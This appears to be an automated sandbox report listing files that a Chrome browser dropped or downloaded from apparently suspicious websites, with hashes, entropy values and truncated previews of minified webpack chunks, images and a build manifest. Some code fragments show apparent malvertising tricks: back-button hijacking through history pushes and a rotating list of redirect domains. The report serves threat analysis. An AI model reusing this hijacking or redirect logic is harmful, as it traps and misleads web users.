                                                                                                          MD5:3A01D5F5C91C211EF0E02B9E0B6EA2E8
                                                                                                          SHA1:58069696D2E6529D21420413BE807E9067938699
                                                                                                          SHA-256:380B6D125A72EE449EC00271F510858F85123F6D8DA7F7C0BD7397274C2ACEDD
                                                                                                          SHA-512:080F5FDFA91942BC9146853522C368B01A70A5BC4D6609A47B13FBF7F8569DDDC8FA61C83E35809BECAA3174D04DDF72F4C46486CD9E876626B6142A92E879C2
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/cce078a36fb49fc2-1736072686539.a4de873c342c784d.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[80086],{80086:function(t,a,e){e.r(a);var r=e(98788),n=e(22970),o=e(56753),s=e(12139),i=e(18394),l=e(17969),c=e(71961),u=e(52929),d=e(35147),p=e(72181),f=e(53444),h=e(51659),m=e(19495),v=e(95798),g=e(34406);a.default=function(t){var a=t.zonesIpp,e=(0,m.bp)(),P=e.state,y=e.dispatch,_=P.oaid,b=P.userData,I=P.passParamToParams,N=P.userAgentData,k=b.subId,w=(0,s.useState)(null),x=w[0],z=w[1];return(0,s.useEffect)((function(){if(!a||x||0===a.length||0===_.length||N.shouldCollectData)return a||(0,c.yN)("/rotate: IPP zones are undefined"),a&&0===a.length&&(0,c.yN)("/rotate: IPP zones are empty"),x&&(0,c.yN)("/rotate: Data is already fetched"),0===_.length&&(0,c.yN)("/rotate: oaid is not ready yet"),void(N.shouldCollectData&&(0,c.yN)("/track: os_version is still to be identified"));var t=a.map((function(t){return(0,h.pR)(t.zones)})).join(";"),e=function(){var a=(0,r.Z)((function(){var a,e,r,o,s,u;return(0,n.__generator)(this,
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (376), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):376
                                                                                                          Entropy (8bit):5.824086313105618
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrkWSE8eD9lLjqBZNoiJxHHNa0WuCZJoex/A0AWGdiQLf:+dbjfd8ehlL0ZCCG0WNPx/qfdiQT
                                                                                                          MD5:E47E2C1B0ED07006AD6BB2D5CC86D21C
                                                                                                          SHA1:A1D8CCF85AFA2A41380C304A33FC840C43CC5E5A
                                                                                                          SHA-256:58CB9607DA95E5377FB5DB591D3D9EADCA75215FEED075186BF3F2D36D4294AB
                                                                                                          SHA-512:B1330E0B293C2E503E8F16ADAF844C8CA80ED657958DC1EEB7013627504732359E6728185C639CC920A96BCDBF37AC5D4E857219E1A376FC2CC3313A01EFCCC8
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[73718],{73718:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_48.584c4353.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlQAAABXRUJQVlA4IEgAAADQAQCdASoIAAgAAkA4JZACdAD0TAItgAD3f4Ua4jloJZ0lCqRVzVBC2HFTu+PI87e+6p557bsT6eXOMFS8Dl+lVX6K8tuAAAA=",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with CRLF, CR, LF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):490
                                                                                                          Entropy (8bit):4.9429203664368515
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:hPIz+VtZA+OCy/XCEqsHyeAbfVJAb9hqAErfiBnPGu:hPIzWvCLHlyfVJy9h7EM
                                                                                                          MD5:92D0A62DC2EE6783157335737ED7091D
                                                                                                          SHA1:622441308321A7B3D0091ABE4A2309BA501DFC3B
                                                                                                          SHA-256:A3CAC0E0EE68803201E75DC10D32ACC33A76ECFD0BA7ECD2CCB006422F1B8CDB
                                                                                                          SHA-512:137C7FC4B2CD2CD0B745A255878AC0AED18482C00EE94980D3A1C752528705E1F1EEC38465E873D0ACC61283401EB06C67C81BF05073D279111956446A00D577
                                                                                                          Malicious:false
                                                                                                          Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="UTF-8" />.. <link rel="icon" type="image/svg+xml" href="/includes/vite.svg" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Home</title>.. <script type="module" crossorigin src="/includes/assets/index-qoqlwAed.js"></script>. <link rel="stylesheet" crossorigin href="/includes/assets/index-B_awNbnU.css">. </head>.. <body>.. <div id="app"></div>... </body>..</html>..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3779), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3779
                                                                                                          Entropy (8bit):5.354427175264234
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:UqS3MesVgwkVw592hTOsY1zINawDjJCVpvIW:dSfRwmFdXNawDwXIW
                                                                                                          MD5:46900B66E876DE517A3F8A42DA508506
                                                                                                          SHA1:E1D252B2DBE22EE02FC4003D00B792009386C701
                                                                                                          SHA-256:A8E5253C00F250E260197F5A4D5FFEF49F1538E2D44FB5F493E8E40FB79B4307
                                                                                                          SHA-512:A0B437903DDAF8674A5E6B8EC854302A9ACD54378992E3F1E2915945D34BC3992BA1E954E1DAAA36A093C37752C460D3CA97AC953161B0D7A29B48E21562D863
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[38904],{50656:function(e,n,r){r.d(n,{N:function(){return v}});var t=r(12139),o=r(61656),a=r(83216),i=r(71961),c=r(35147),u=r(21818),s=r(51659),l=r(94397),d=r(19495),f=["coajutoa.com","furgoomi.com","kabortot.com"],v=function(){var e=(0,t.useState)(0),n=e[0],r=e[1],v=(0,t.useState)(!1),p=v[0],b=v[1],k=(0,d.bp)().state,w=k.oaid,E=k.userData,h=k.passParamToParams,m=k.userAgentData,T=E.subId,P=m.data.platformVersion,y=(0,l.k)(P);(0,t.useEffect)((function(){b(function(){var e=navigator.userAgent;return/iPhone|iPad|iPod|Macintosh|Mac OS X/i.test(e)}())}),[]),(0,t.useEffect)((function(){var e=setInterval((function(){r(0)}),1e4);return function(){return clearInterval(e)}}),[]);return{initBack:function(e){var t;if(k.back.isEnabled)if(n>12&&p)(0,i.yN)("initBack: Too much pushStateToHistory");else{var l,d,v,b,E=null!==(l=k.back.historyTimeAmount)&&void 0!==l?l:3,m=null===(t=k.back.zones)||void 0===t?void 0:t.find((function(e){r
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 512x512, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14024
                                                                                                          Entropy (8bit):7.986029735867096
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:8PnSZFcbOPEzu1vUcyrigDlVQSNSiVVE+7v6:8PUmtzuRyGMVQSzVVJT6
                                                                                                          MD5:B51B23F29B2F6044C821B677F7BC659C
                                                                                                          SHA1:A95FCAE33277F87C9AEB35AA0E8033D9F4416461
                                                                                                          SHA-256:DD96EE6CE02B6949DA643F74A3D202266E363B8722DB90BD0C0829EF1ACE04AC
                                                                                                          SHA-512:87BA03DC85C79C03C64815E998F28EFF3ECE98C86A87415996F713BEACF9CEC43A1C5AD6718051648FC27104540997FF967F20635ED41073BFA706677D199DE6
                                                                                                          Malicious:false
                                                                                                          Preview:RIFF.6..WEBPVP8 .6..0,...*....>m0.F$%!./2.h...gnrx:.......3......z.....@..'O2.#.V..~....}a.....Nd|C......_....o.?.'..y.o...;......._...?...a/......\.....G.....?.~9}...........P7.O._..f._........(.....{........B...o"t..}.O9...s...<.......z.1...6i.;........[....;...+.o.~....]5.;.?.>..........W.......J..q.N~..rR@.....!Y...w^0c...:.Qz_d....i.4.....m.e....V:A...M<qX..]. 8.U...2mk|e2...l.. yJ.gk,..>.N..9...-..m.P.......$......Hl...`......z..y....Ny.T.>i.w...\.iS...^..k..v.........t4:2X...N..E..b.y$..EN...........o...*.e...........%T.......!.'Q.s=.4%..&....I....nm.B.2.V..N..!..4..1.!..z..o...x.w.O.Q.$D...N^..F.E....k.iJ...u...*P.LW.m.U.z.1.t....L.`....V..T........^.....E..._!..W........T...\.I.{.<..".0.....0.aqS...?3.BB>c...uA..............TbJY..j+..u.[;..v.7".]@]...R..G.A....[...C....x-?uys[...l.W...C..........w"N...e..j,.^W.N.....iCJ.....{.H.......C*\....U.N.wG..#...C>'A.v...h....6..kQ,..d..b.....j...b..my..H.P.U.e...BD.A...=...{.0.............g..\
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (384), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):384
                                                                                                          Entropy (8bit):5.851947930162583
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrhDU4LtNQ3lLjH99uNoiJxHHNaKtNRWn8RsQTt1XvzatJ7QOqdKwdl:+dbjhAGtC3lLD98CCGshfqXmKwdiQT
                                                                                                          MD5:EAA8AD748168870153C979207374DAC3
                                                                                                          SHA1:209043580D096730DED8478BDACFF18BC0029824
                                                                                                          SHA-256:ED064E621022DCB76F54F8AA2491B798980B4DE77BADC11772E384B189FEC197
                                                                                                          SHA-512:566B8CC263E771FEDFF22739577EAF8DF78B23DDA818D5A91F027BBE3C3AEB1B29752DF94463F75964DB4DC59927BA8BA36BEEFF6477A7C2380A5F6861CD5F8A
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[43623],{43623:function(A,t,e){e.r(t),t.default={src:"/_next/static/media/m_20.62b047c4.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRloAAABXRUJQVlA4IE4AAABQAgCdASoIAAgAAkA4JQBOja/h4gItBIiU2YAA/vGojk0uwMOnHhg3U5znwSl3k8IPKHY3YNHpqOLpCyN2WU5k25at69D32W8sm+9kAAA=",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):28
                                                                                                          Entropy (8bit):3.950212064914748
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:WZoS8/ZYn:WZoS8/ZYn
                                                                                                          MD5:C3F64CB2A8B00CBBC30CE2908208A29D
                                                                                                          SHA1:E4AA7CAB67F4CF5FA52371DDC25A75AAFD4D0CCC
                                                                                                          SHA-256:391601283994BCD9486160BF8A5637410D280E1BDDD3AEF5428454976E193E81
                                                                                                          SHA-512:6CCBC26128FE65D6D313B965DA3D2E201D506442D0036404ABB490BE0FC99B3A0FDB611269B932DBA7F3A621E11F79ED213D2B11D487EE39C54A17D97A823552
                                                                                                          Malicious:false
                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwl0hgwWgcd-khIFDZFhlU4SBQ2RYZVO?alt=proto
                                                                                                          Preview:ChIKBw2RYZVOGgAKBw2RYZVOGgA=
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):94
                                                                                                          Entropy (8bit):4.999057899712834
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:HHJQlJHnS2iCbFSKPj37w+HIEnS2Q/BRqVYv:nJKnS7qRj3kuHnSp/BRqVYv
                                                                                                          MD5:713232515D5953CA41BEDA3289D625E3
                                                                                                          SHA1:5BF907D001919662E65031648137CCE6CA4AD652
                                                                                                          SHA-256:E7B29BA0CDBDC0B5BFAE0D3F38965537552F38D85E0A4ABC0A179D52DF511D57
                                                                                                          SHA-512:57CCC9C892FF104924DBA742AEDD2440CBC1F8D5B57EE06C0C6EB8E33DC5AF91E7304EDCA5B64A9E27B0EF4392921283910D9967BCFDF7BA432457C42BB515B7
                                                                                                          Malicious:false
                                                                                                          URL:https://bohlepropiedades.com/includes/assets/index-B_awNbnU.css
                                                                                                          Preview:.bg-blue[data-v-4d7e03c8]{background-color:#489ffa}.m-w-250[data-v-4d7e03c8]{max-width:250px}.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (384), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):384
                                                                                                          Entropy (8bit):5.774627278458718
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzriUQ8B0beD9lLjH2LxmPNoiJxHHNaKtNRWvRkSocARq2aWO4mIdiQT:+dbjiUBAehlLDsOCCGsXcARGAdiQT
                                                                                                          MD5:B3D44B4EE2D780508F509806B57EE20D
                                                                                                          SHA1:8E943EF184A66EC02FBA8878611E5C93CD4BA3B5
                                                                                                          SHA-256:D057C51A02934434B40AC112400723B881585B3DF09C5E4C52A3EB96B4BD3C55
                                                                                                          SHA-512:A5497E263C24EA5C0FF96AE2F451FCA1EC5580444F9A87EC624C2704A97FB491DD3DA9D9476DE20BC0920358BE7C9BE5620BC71F255D3148B3FDEF8E0373D7BC
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[11504],{11504:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_45.d4b4b23a.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRloAAABXRUJQVlA4IE4AAAAQAgCdASoIAAgAAkA4JYwCdAEf/1PTwCwAAP72fp7mHer4Itmf4+xCr+K2sVD5os/SqJs8P3RKAh8dx1MEVW1EqYa49UkAeCO2KUPAAAA=",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (24050), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):24050
                                                                                                          Entropy (8bit):5.075953166280122
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:9bU8VhKhoSCI1mcvCElLy8VgQlqCbilN2KCkDmgMnOuTbT8TbTqgkgXgtgmg+gji:9AahKhoSCI1mcvCElLy8VgQlqCbilN2B
                                                                                                          MD5:EDFFBACAD223AA98B6723B8BF48A5A45
                                                                                                          SHA1:8C0EBF6D8554779CFF051623B535267664ED7CBC
                                                                                                          SHA-256:F5097C535C8E1D3E8B26A557B80B6C29DF831E9EA60F4FDBB3517D1E4992E91F
                                                                                                          SHA-512:1B36606838DCCF351DA8CE505B12E01CD48B040CFF10074F502B18759298D1D46E5EA7273132B2880F272653187E133F29103F4EAB6EA9E1E5596352071C77C2
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/b88eab57f2676fbf-1736072686539.7179d464977285be.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[59801,76435],{76435:function(n,e,i){i.d(e,{g:function(){return o}});var o=function(n){var e=n.imagesMap,i=n.requestedImage,o=n.additionalProperties;if(i){var d=e[i];return o&&(o.imageContainerStyle&&(d.imageContainerStyle=o.imageContainerStyle),o.style&&(d.style=o.style)),d}}},97893:function(n,e,i){i.d(e,{G:function(){return o},q:function(){return m}});var o,d,r=i(47842),t="/_next/static/media/flowers.f5cdb35b.webp",l=50,u=50,a="/_next/static/media/socks.0cb643e0.webp",v=111,h=100,c="/_next/static/media/valentine-heart.5c3639ee.webp",f=85,s=97;!function(n){n.FLOWERS="FLOWERS",n.SOCKS="SOCKS",n.HEART="HEART"}(o||(o={}));var m=(d={},(0,r.Z)(d,o.FLOWERS,{src:t,width:u,height:l}),(0,r.Z)(d,o.SOCKS,{src:a,width:h,height:v}),(0,r.Z)(d,o.HEART,{src:c,width:s,height:f}),d)},59801:function(n,e,i){i.d(e,{h:function(){return W}});var o=i(56753),d=i(47747),r=i(53444),t=i(12139),l=i(92228),u=i(93888);function a(){var n=(0,l.Z)(["
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (1253), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1253
                                                                                                          Entropy (8bit):5.346174453820216
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Z8cMKEnwSyqYrhHy1OOyXoNHwiVJqAp2FV:JEnBYBOy4iiyUs
                                                                                                          MD5:EDF2D26EEAE995D575A1633132132983
                                                                                                          SHA1:D7A1EEB699E800F9F69D76A1A5425825201868FF
                                                                                                          SHA-256:F493BEB840B7CD4B91E7613E05E25EE3634988B510C1199E846ABFA2750FEBF9
                                                                                                          SHA-512:48A8A7E5A2067B308F335E54C10EE773D9B0ADD2E5FFAEE8605B4D11199A28228B0F1F389AAA7D56086E5858623AE0C86C91EC250616FDE47CF2C94420DEB6F0
                                                                                                          Malicious:false
                                                                                                          Preview:self.__BUILD_MANIFEST={__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":["static/chunks/407da83598ea2235-1736072686539-13288ea094322088.js"],"/404":["static/chunks/230792267814e39d-1736072686539-db36d95ae68fb7a1.js"],"/_error":["static/chunks/a36867e63359bbb9-1736072686539-4dc46aa924ea7180.js"],"/article/[id]":["static/chunks/0c51ac0c16ed4101-1736072686539-d2cdc237bddcf0bb.js","static/chunks/0c3a4dbdeb5a7b21-1736072686539-805a97de1d320c47.js"],"/back":["static/chunks/83b9c7ce75a0e28f-1736072686539-568c3335b1064321.js"],"/cookie":["static/chunks/fe787fe57a3bfdb3-1736072686539-ba4ecb61feb00f90.js"],"/privacy-policy":["static/chunks/470ac8bc3d32ab50-1736072686539-3dce3a19f603ab40.js"],"/push-opt-out":["static/chunks/05fcdf2f9e647203-1736072686539-6b40832bacb02c13.js"],"/terms":["static/chunks/de53a2e1559aef61-1736072686539-d65d75189a797d23.js"],"/[landingName]/[configId]/[[...slug]]":["static/chunks/e349ffdbb65d6c93-1736072686539-660e5b7e2e3b7996.js","static/chunks/f11a4c03247183
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (48323), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):48323
                                                                                                          Entropy (8bit):5.574702440892877
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:uYs+uOrz9/Jlu4V5n9zb3keFEUTqKi6VWelLzEXi7MXo0rQy01/DPQB3QEg/7m27:uYs+/l9jEgxNouJ
                                                                                                          MD5:7841091545F4D1A4CA806F94BB470E51
                                                                                                          SHA1:1E33DB39DAE7AD0AAAA5E1D1B27FC6B94D83FE7F
                                                                                                          SHA-256:F2B77B085B76A2908C615B41E60DB0B6ADE155FA22F9C1CAF5B2BB3EB89438CC
                                                                                                          SHA-512:F9A9C1058505DC8A33077DBBD4EF290DE51FA87E61B3A00FF7F8DF5CC7C8F4B0B88E38D4A514A02354ABD14F6369EC941BAD88E41CAF6EB386DACE1B82E49212
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/87040b3d41357533-1736072686539.6a095265338b008b.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[15850],{6375:function(n,e,t){t.d(e,{E3:function(){return o},ed:function(){return r},iM:function(){return u}});var r,i=t(98800),a=t(27951);!function(n){n.QUESTIONS="questions",n.PROGRESS="progress",n.FINAL="final"}(r||(r={}));var o=new URLSearchParams(window.location.search).has("showProgress")?r.PROGRESS:r.QUESTIONS,u=function(n){switch(n){case i.I.DARK:case i.I.LIGHT:return a.i.warning;case i.I.NEW_YEAR:return a.i.xmas;case i.I.FINANCE_RATING:return a.i.finalNewFinance;case i.I.FINANCE_RATING_GREEN:return a.i.finalNewFinanceGreen;case i.I.BLACK_RED:return a.i.shadowGreen;case i.I.MONEY:return a.i.money;default:return a.i.warning}}},15850:function(n,e,t){t.r(e),t.d(e,{default:function(){return An}});var r=t(70865),i=t(96670),a=t(66383),o=t(56753),u=t(25237),c=t.n(u),s=t(12139),d=t(93888),l=t(9149),f=t(76435),I=t(41206),p=t(77496),A=t(80795),N=t(98800),E=t(21818),h=t(11133),g=t(97897),x=t(29754),m=t(46889),v=t(48045),
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (5922), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):5922
                                                                                                          Entropy (8bit):5.409393426145938
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:lrU9LOCxmUblWmReE/eEzeEhX7KMeEQmeEUdveE5FeE5sOeE55eE0qbQk4AdUz9C:lrslxmUxxp/pzpN7KMpBpuvpHp7pPpBp
                                                                                                          MD5:65063C6FEB5AB7A615FD840B529A6E85
                                                                                                          SHA1:16527FC7D8E0F16A589E2CD2D28A9BACD674120A
                                                                                                          SHA-256:18B358474B3575BF20CA8A785837131819E4F00ABB18930094D8FD51B2032973
                                                                                                          SHA-512:EFDC4CCF5CD0DD01AD669472FD0685C48DC8B73A470F06BB8B3F741161B9BC1C104A4277321A02B7B61938711755F5309FFD65ABD2CA28CC87A58AE56B9D9A4A
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/c2f96434bddabe6e-1736072686539.3a22e244b1dff92a.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[64683],{64683:function(e,n,o){o.r(n),o.d(n,{default:function(){return C}});var i=o(98788),t=o(22970),c=o(12139),r=o(13923),a=o(71961),s=o(19495),u=o(95798),l=o(9097),f=o(43601),m=o(66383),C=function(e){var n=e.landingName,o=e.configId,C=e.customCookieLifetime,h=e.exitUniquenessZoneWeightRelation,k=(0,s.bp)(),d=k.state,v=k.dispatch,N=(0,f.N)(r.B.NON_UNIQUE_CROSS_DO),p=(0,f.N)(r.B.NON_UNIQUE_CROSS_TEEN_DO),_=function(e){var n;if(!!(null===h||void 0===h?void 0:h.isEnabled)&&!!(null===h||void 0===h||null===(n=h.relation)||void 0===n?void 0:n.length)){var o=function(e){var n=e.viewCount,o=e.isCycled,i=e.relation;if(0===i.length)return 1;var t=i.reduce((function(e,n){var o=(0,m.Z)(n.range,2),i=o[0],t=o[1];return null!==t?e+(t-i+1):e}),0);if(0===t&&o)return 1;var c=n;o&&t>0&&(c=n%t);var r=!0,a=!1,s=void 0;try{for(var u,l=i[Symbol.iterator]();!(r=(u=l.next()).done);r=!0){var f=u.value,C=(0,m.Z)(f.range,2),h=C[0],k=C[1];if(c>
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (24050), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):24050
                                                                                                          Entropy (8bit):5.075953166280122
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:9bU8VhKhoSCI1mcvCElLy8VgQlqCbilN2KCkDmgMnOuTbT8TbTqgkgXgtgmg+gji:9AahKhoSCI1mcvCElLy8VgQlqCbilN2B
                                                                                                          MD5:EDFFBACAD223AA98B6723B8BF48A5A45
                                                                                                          SHA1:8C0EBF6D8554779CFF051623B535267664ED7CBC
                                                                                                          SHA-256:F5097C535C8E1D3E8B26A557B80B6C29DF831E9EA60F4FDBB3517D1E4992E91F
                                                                                                          SHA-512:1B36606838DCCF351DA8CE505B12E01CD48B040CFF10074F502B18759298D1D46E5EA7273132B2880F272653187E133F29103F4EAB6EA9E1E5596352071C77C2
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[59801,76435],{76435:function(n,e,i){i.d(e,{g:function(){return o}});var o=function(n){var e=n.imagesMap,i=n.requestedImage,o=n.additionalProperties;if(i){var d=e[i];return o&&(o.imageContainerStyle&&(d.imageContainerStyle=o.imageContainerStyle),o.style&&(d.style=o.style)),d}}},97893:function(n,e,i){i.d(e,{G:function(){return o},q:function(){return m}});var o,d,r=i(47842),t="/_next/static/media/flowers.f5cdb35b.webp",l=50,u=50,a="/_next/static/media/socks.0cb643e0.webp",v=111,h=100,c="/_next/static/media/valentine-heart.5c3639ee.webp",f=85,s=97;!function(n){n.FLOWERS="FLOWERS",n.SOCKS="SOCKS",n.HEART="HEART"}(o||(o={}));var m=(d={},(0,r.Z)(d,o.FLOWERS,{src:t,width:u,height:l}),(0,r.Z)(d,o.SOCKS,{src:a,width:h,height:v}),(0,r.Z)(d,o.HEART,{src:c,width:s,height:f}),d)},59801:function(n,e,i){i.d(e,{h:function(){return W}});var o=i(56753),d=i(47747),r=i(53444),t=i(12139),l=i(92228),u=i(93888);function a(){var n=(0,l.Z)(["
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (26671), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):26671
                                                                                                          Entropy (8bit):5.2722107094697765
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:sv5bZ0z3IcV+NtIVVLuugpbSw2tC9pVCeBo01ALKiol7YACwEbhkX:svtZsIS+NSf6SwT9Vl89bhkX
                                                                                                          MD5:46319DA25B781D320119BB919F754F17
                                                                                                          SHA1:F469C209AC6ECE789AFC95873888DE04B0268EEA
                                                                                                          SHA-256:99199D4C9B8E1653AF1EA901B3F856FE9537A6FF869ABAD68CA5C5F8D253EDA5
                                                                                                          SHA-512:5BCA381AC1DFE97B5EBF0FEFC9C6AF2F2FBDF7F251CFFD56D31B5C18750D6F19D676C257BFF34DBEF92157A803276D9E023ED4D97BA1905928EBF6A6A5FF20D3
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/1c02c3e681ea9f6d-1736072686539-ebf163de3da5e125.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[49774],{12139:function(n,e,t){t.r(e),t.d(e,{Children:function(){return $},Component:function(){return i.wA},Fragment:function(){return i.HY},PureComponent:function(){return F},StrictMode:function(){return Tn},Suspense:function(){return G},SuspenseList:function(){return Q},__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED:function(){return Cn},cloneElement:function(){return Pn},createContext:function(){return i.kr},createElement:function(){return i.az},createFactory:function(){return wn},createPortal:function(){return _n},createRef:function(){return i.Vf},default:function(){return Wn},findDOMNode:function(){return Hn},flushSync:function(){return Un},forwardRef:function(){return z},hydrate:function(){return sn},isElement:function(){return Ln},isFragment:function(){return Nn},isMemo:function(){return xn},isValidElement:function(){return Sn},lazy:function(){return K},memo:function(){return I},render:function(){return an
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=5, orientation=upper-left, xresolution=74, yresolution=82, resolutionunit=2], baseline, precision 8, 750x353, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18140
                                                                                                          Entropy (8bit):7.665088168264263
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:DwRhyuDRA2h7wD1iZL8vlaH7oR5qQp7W9pHwNi5/t:kny2PE+QvlaHMR5InwN+1
                                                                                                          MD5:281B247747F6E358EDDA1E24B265FB10
                                                                                                          SHA1:8016BCD4CE439AB9B982DBC1C92BFD91B9BE2D78
                                                                                                          SHA-256:CD70C7DB0ADD17E0A71419BD22C4A032AA540C6E6210208551CFC57BCD3971F3
                                                                                                          SHA-512:B0896EB9C854FD86CA332BDF90CFB23673F0FDE68659BA257388206985FD1DCB982F981AF1810012EEF4BDD9481C660C6D58920E446C4E2EC37A7D8C35D85107
                                                                                                          Malicious:false
                                                                                                          Preview:......Exif..II*...........................J...........R...(...........i.......Z.......H.......H.................0210........0100................................a..........C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......a...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..(....(...(............[UZ.a..$.7.=.....V..(...(...(...(...(.,.z.Z)..'..@......&.@....SQ.OzJ.....L...Q@.,Ozm.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (15494), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15494
                                                                                                          Entropy (8bit):5.4047651425312475
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:U+LzcYfx8a1TPtK9Uk7Z0d2qIygsB+sKBeZYfEUOHYQ7/VhMIHjrQAFyrnPkW:VLQ9QTPEU94S+pQZQk7LlHjUAMrnPT
                                                                                                          MD5:246C62A01CA76C5E64B7879C01635219
                                                                                                          SHA1:FAA25C8618C4ADC07D9E2619AA386782D21E2C7A
                                                                                                          SHA-256:E0E4A9F620AF9B0283AD84377BFEDC59EC8091DBED06D8F32F37A59D0CB30721
